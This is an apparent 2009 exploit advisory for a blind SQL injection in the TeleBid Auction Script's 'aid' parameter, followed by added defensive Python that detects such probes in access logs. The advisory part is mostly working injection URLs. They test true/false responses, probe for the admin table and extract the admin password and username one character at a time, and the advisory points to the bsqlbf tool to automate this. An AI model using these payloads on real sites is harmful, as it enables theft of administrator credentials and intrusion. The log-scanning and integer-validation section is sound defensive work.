
TelebidAuctionScriptaid Blind SQL Injection Vulnerability

TelebidauctionScript(aid) Blind SQL Injection Vulnerability
____________________________________

Author : Hussin X

Home : www.IQ-TY.com

email : darkangel_g85@Yahoo.com

____________________________________

Vendor : http://www.telebidauctionscript.com/

Demo :
_______

http://server/allauctions.php?aid=2+and+1=1 (true)

http://server/allauctions.php?aid=2+and+1=0 (false)

:: Table ::

http://server/allauctions.php?aid=2+and+(SELECT+1+from+admin+limit+0,1)=1

:: column pass and username ::

http://server/allauctions.php?aid=2+and+(SELECT+substring(concat(1,pass),1,1)+from+admin+limit 0,1)=1

http://server/allauctions.php?aid=2 and (SELECT+substring(concat(1,username),1,1) from admin limit 0,1)=1

note : Use the "bsqlbf" to write detailed information

Greetz
WwW.IQ-ty.CoM , Tryag.cc

| CraCkEr | Cyber-Zone | str0ke | jiko




Hussin X                                                                                                           11/17/2009
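
A defender-side check for the probing pattern shown in the demo, as an added example that is not part of the original advisory: it scans access-log lines for `aid` values on `allauctions.php` that are not plain integers, and flags clients whose tampered requests came back with differing response sizes. The log lines, the assumption that `aid` is a plain numeric id, and the function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines for illustration (documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [17/Nov/2009:10:00:01 +0000] "GET /allauctions.php?aid=2 HTTP/1.1" 200 5120
203.0.113.9 - - [17/Nov/2009:10:00:05 +0000] "GET /allauctions.php?aid=2+and+1=1 HTTP/1.1" 200 5120
203.0.113.9 - - [17/Nov/2009:10:00:06 +0000] "GET /allauctions.php?aid=2+and+1=0 HTTP/1.1" 200 812
203.0.113.9 - - [17/Nov/2009:10:00:07 +0000] "GET /allauctions.php?aid=2%20and%20(SELECT+1+from+admin+limit+0,1)=1 HTTP/1.1" 200 5120
198.51.100.7 - - [17/Nov/2009:10:00:09 +0000] "GET /index.php?aid=abc HTTP/1.1" 200 300
""".splitlines()

LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+|-)')
VALID_AID = re.compile(r'[0-9]{1,10}')  # assumption: aid is a plain numeric auction id


def flag_aid_tampering(lines, path="/allauctions.php"):
    """Return {client_ip: [(decoded_aid, status, size), ...]} for non-numeric aid values."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status, size = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs decodes both '+' and %20 to spaces, so encoding variants look alike
        for aid in parse_qs(url.query, keep_blank_values=True).get("aid", []):
            if not VALID_AID.fullmatch(aid):
                hits[ip].append((aid, int(status), size))
    return dict(hits)


def boolean_probe_clients(hits, min_requests=2):
    """Clients whose tampered requests got differing response sizes: the
    true/false page difference that blind extraction depends on."""
    return sorted(ip for ip, rows in hits.items()
                  if len(rows) >= min_requests and len({size for _, _, size in rows}) > 1)


if __name__ == "__main__":
    found = flag_aid_tampering(SAMPLE_LOG)
    for client in boolean_probe_clients(found):
        print(client, [aid for aid, _, _ in found[client]])
```

The same integer-only rule applied in the application before the query is built (casting `aid` to an integer or binding it as a query parameter) removes the condition the log check is looking for.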

								